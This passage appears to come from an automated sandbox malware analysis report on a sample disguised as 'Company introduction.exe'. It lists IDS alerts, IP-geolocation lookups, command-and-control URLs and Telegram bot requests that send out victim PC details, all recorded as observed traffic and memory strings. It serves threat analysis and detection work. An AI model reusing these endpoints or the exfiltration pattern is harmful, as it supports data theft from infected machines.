                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.48.1:443
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49741 version: TLS 1.0
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 07:39:15 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 15 Jan 2025 07:39:17 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                Source: Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                Source: Company introduction.exe, 00000000.00000002.1732379162.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000000.00000002.1732379162.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1756873041.0000000002998000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20a
                Source: FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003506000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Company introduction.exe, 00000006.00000002.2941471703.0000000003260000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Company introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 